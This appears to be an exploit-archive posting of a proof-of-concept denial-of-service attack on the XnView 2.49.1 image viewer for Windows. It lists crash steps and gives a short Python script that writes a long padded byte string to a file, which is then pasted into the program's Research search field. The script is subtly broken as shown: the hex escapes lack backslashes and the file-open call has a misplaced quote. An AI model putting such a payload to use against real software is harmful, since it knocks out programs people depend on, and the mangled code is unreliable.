XnView 2.49.1 – ‘Research’ Denial of Service (PoC)

# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage :  http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7

'''
Proof of Concept (PoC):
=======================

1.Download and install XnView
2.Open the XnView for Windows tools 
3.Run the python operating script that will create a file (poc.txt)
4.Run the software " Tools -> Research -> A search window opens "
5.Copy and paste the characters in the file (poc.txt)
6.Paste the characters in the field 'File Name' and  'In' click on 'Research'
7.XnView for Windows Crashed
'''

#!/usr/bin/python

DoS=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01"
"x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E"
"x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22"
"x40x4fx73x61x6ex64x61x4dx61x6cx69x74x68x00x00x00"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x74x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41")

poc = DoS
file = open("poc.txt,"w")
file.write(poc)
file.close()

print "POC Created by ZwX"
            

Comments are closed.